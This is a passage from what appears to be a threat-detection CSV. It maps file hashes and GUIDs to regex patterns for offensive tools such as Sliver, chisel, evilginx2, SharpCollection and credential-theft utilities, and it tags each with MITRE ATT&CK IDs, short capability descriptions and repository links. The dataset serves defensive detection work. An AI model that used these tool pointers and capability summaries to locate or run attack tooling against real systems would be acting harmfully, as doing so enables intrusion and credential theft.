fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c7985c82769ce2d6d68e3ed3926df1bc47523990c56cfa1ebe3e511e4b96a903*",".{0,1000}c7985c82769ce2d6d68e3ed3926df1bc47523990c56cfa1ebe3e511e4b96a903.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*c7bbfa266cc73f87a47186afadea101ceb03f759cf4b927a25dd1004d56ea07e*",".{0,1000}c7bbfa266cc73f87a47186afadea101ceb03f759cf4b927a25dd1004d56ea07e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c7c0c7e68bcc0ce7fbb15505434740e0528ab1240eeb8c3a123c3d84b8f6eefa*",".{0,1000}c7c0c7e68bcc0ce7fbb15505434740e0528ab1240eeb8c3a123c3d84b8f6eefa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c7d0e470542ece3342535057e01e84b962b19959e5142aa61633f49ebaa52775*",".{0,1000}c7d0e470542ece3342535057e01e84b962b19959e5142aa61633f49ebaa52775.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*C7E4B529-6372-449A-9184-74E74E432FE8*",".{0,1000}C7E4B529\-6372\-449A\-9184\-74E74E432FE8.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). 
To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*C7F1F871-8045-4414-9DC3-20F8AA42B4A1*",".{0,1000}C7F1F871\-8045\-4414\-9DC3\-20F8AA42B4A1.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*c7ffb81b3cd5cfcfe18363f998cd64428423814d5a8713d89e7992941884587d*",".{0,1000}c7ffb81b3cd5cfcfe18363f998cd64428423814d5a8713d89e7992941884587d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*c80284ccc6e7c2dab2845923cf4eb2eb02b87292df93f65fd1c54ec726b537fc*",".{0,1000}c80284ccc6e7c2dab2845923cf4eb2eb02b87292df93f65fd1c54ec726b537fc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c821704956c03e7edc23f0eab92bb7ecb668cf34016c523101681c608645da67*",".{0,1000}c821704956c03e7edc23f0eab92bb7ecb668cf34016c523101681c608645da67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c8273217f19cd8f6f693c350dea5bd6fff1ced10bf83174bbabab4656579c3cb*",".{0,1000}c8273217f19cd8f6f693c350dea5bd6fff1ced10bf83174bbabab4656579c3cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c83cac1c4228e554b93ead6aa834427b52f420dd0beda7d7130dbf565fc3ee14*",".{0,1000}c83cac1c4228e554b93ead6aa834427b52f420dd0beda7d7130dbf565fc3ee14.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c8458f30f7c976ba1be9cb1c1175b1f0d32aea6fdeb3f62ab911ea77713ede63*",".{0,1000}c8458f30f7c976ba1be9cb1c1175b1f0d32aea6fdeb3f62ab911ea77713ede63.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*C8482002-F594-4C28-9C46-960B036540A8*",".{0,1000}C8482002\-F594\-4C28\-9C46\-960B036540A8.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*c850818a6b19486dae2a4c370797cbb4fa61a4ebd35cba8e94a60b54c4499c8b*",".{0,1000}c850818a6b19486dae2a4c370797cbb4fa61a4ebd35cba8e94a60b54c4499c8b.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" 
"*c85c00d64c49d48f8b3cd34210e4604ac10853758e206bd6f5aa6f9ee2d19b3e*",".{0,1000}c85c00d64c49d48f8b3cd34210e4604ac10853758e206bd6f5aa6f9ee2d19b3e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*c86b6630f868d20303e940cd8f1a8805f1013bc567938a79cedb318b07f5f498*",".{0,1000}c86b6630f868d20303e940cd8f1a8805f1013bc567938a79cedb318b07f5f498.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*c86c8f8a69c07fbec8dd650c6604bf0c9876261f*",".{0,1000}c86c8f8a69c07fbec8dd650c6604bf0c9876261f.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*c87bec6a236d81bed01df7c7e576308bf421d4cd3afa826a3f439a422a888fb9*",".{0,1000}c87bec6a236d81bed01df7c7e576308bf421d4cd3afa826a3f439a422a888fb9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*C88D7583-254F-4BE6-A9B9-89A5BB52E679*",".{0,1000}C88D7583\-254F\-4BE6\-A9B9\-89A5BB52E679.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*c8bdc5ce227d167f87797e8f7b3d91d24cd40c0925f5f6406085ad8cdf455617*",".{0,1000}c8bdc5ce227d167f87797e8f7b3d91d24cd40c0925f5f6406085ad8cdf455617.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*C8C12FA3-717F-4D35-B8B3-2E7F7A124E7C*",".{0,1000}C8C12FA3\-717F\-4D35\-B8B3\-2E7F7A124E7C.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*c8c738978ad5131ed15b42f0609008d63513a4b402798b1de20941f4a5993219*",".{0,1000}c8c738978ad5131ed15b42f0609008d63513a4b402798b1de20941f4a5993219.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
"*C8D738E6-8C30-4715-8AE5-6A8FBFE770A7*",".{0,1000}C8D738E6\-8C30\-4715\-8AE5\-6A8FBFE770A7.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*c8e190fea8360f02cf9cba596c62d17498e016ec1339b314131a1b828d21b090*",".{0,1000}c8e190fea8360f02cf9cba596c62d17498e016ec1339b314131a1b828d21b090.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*C91C8B29-82DF-49C0-986B-81182CF84E42*",".{0,1000}C91C8B29\-82DF\-49C0\-986B\-81182CF84E42.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*c922f6e29c844d15946890f4872230dd9469dd0cce084e913a8df3ef3ea5d126*",".{0,1000}c922f6e29c844d15946890f4872230dd9469dd0cce084e913a8df3ef3ea5d126.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open 
source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c923b2051d3e822e390e80c7e8d56f6b2cc62ae6688ca73745684b57154f3ecb*",".{0,1000}c923b2051d3e822e390e80c7e8d56f6b2cc62ae6688ca73745684b57154f3ecb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*c929214fbc050208831b18c088d33e0db1ffcd2f26103bc3a69b0081683db1c8*",".{0,1000}c929214fbc050208831b18c088d33e0db1ffcd2f26103bc3a69b0081683db1c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c92eaefade39fccf3a8926ae8b579333b37a58bc15e4c536eeb16b6bdb97f5c8*",".{0,1000}c92eaefade39fccf3a8926ae8b579333b37a58bc15e4c536eeb16b6bdb97f5c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*c9448628b8a4a715f780bf821eab6e39962a774ecdcf808628ea6ef952372722*",".{0,1000}c9448628b8a4a715f780bf821eab6e39962a774ecdcf808628ea6ef952372722.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c96ef7d84ab7d43b03330daf4e78c11aa9407662f4a18d1824fa1506694c8c56*",".{0,1000}c96ef7d84ab7d43b03330daf4e78c11aa9407662f4a18d1824fa1506694c8c56.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*c97e3b0e4180217fe46b36d70163c750a40ed76d402ca6c1784e3d8e6c3b22b0*",".{0,1000}c97e3b0e4180217fe46b36d70163c750a40ed76d402ca6c1784e3d8e6c3b22b0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c9a56e555aa154cca1e25d511e2201cc522307ca09b54346860d375447ec7929*",".{0,1000}c9a56e555aa154cca1e25d511e2201cc522307ca09b54346860d375447ec7929.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c9cd5c71f55be91b6f64f93e17d7dd2a3fa9b66dda9b9c11bf4140c66f18ed39*",".{0,1000}c9cd5c71f55be91b6f64f93e17d7dd2a3fa9b66dda9b9c11bf4140c66f18ed39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c9da78ad6095451caaf4dc686005d5145494e9f7be36514423a111242ff523f2*",".{0,1000}c9da78ad6095451caaf4dc686005d5145494e9f7be36514423a111242ff523f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c9f355952a93723f4e6b471380f35a1315af1d2de40524ee0bdd252deded71d2*",".{0,1000}c9f355952a93723f4e6b471380f35a1315af1d2de40524ee0bdd252deded71d2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c9f72eb2e307e3a7689a46f5e2e6c87bfe8f76c977b37e689b4ff3b1895b731e*",".{0,1000}c9f72eb2e307e3a7689a46f5e2e6c87bfe8f76c977b37e689b4ff3b1895b731e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ca081dfda125f3b14589e205288777bdc209941e50cebb2298262adcd5c76c86*",".{0,1000}ca081dfda125f3b14589e205288777bdc209941e50cebb2298262adcd5c76c86.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*ca12dd05b0f8cff9da1c8e088808a8c6e3218eefa22c0d92469abda3888dab4d*",".{0,1000}ca12dd05b0f8cff9da1c8e088808a8c6e3218eefa22c0d92469abda3888dab4d.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*ca16e87c3ffc6496a23618ff180b0a57ec07e290207d47e8dc7489a208bf4d85*",".{0,1000}ca16e87c3ffc6496a23618ff180b0a57ec07e290207d47e8dc7489a208bf4d85.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ca26faa4eec38d70b7237a0d1da33577295731d34c9aefa08ecdb2e8000cb4af*",".{0,1000}ca26faa4eec38d70b7237a0d1da33577295731d34c9aefa08ecdb2e8000cb4af.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*CA280845-1F10-4E65-9DE7-D9C6513BBD91*",".{0,1000}CA280845\-1F10\-4E65\-9DE7\-D9C6513BBD91.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" 
"*ca3227c4d833b341752927a08d6b41f0c3c81c03f41827859ecff6d008d45172*",".{0,1000}ca3227c4d833b341752927a08d6b41f0c3c81c03f41827859ecff6d008d45172.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ca32913db657697990e77b687cfdd25a3d40c45169802c874738581d3408549f*",".{0,1000}ca32913db657697990e77b687cfdd25a3d40c45169802c874738581d3408549f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ca39c3b109987159e58bfa9feb0978f376837f177b1d3b19b49ce29e4d72d90a*",".{0,1000}ca39c3b109987159e58bfa9feb0978f376837f177b1d3b19b49ce29e4d72d90a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
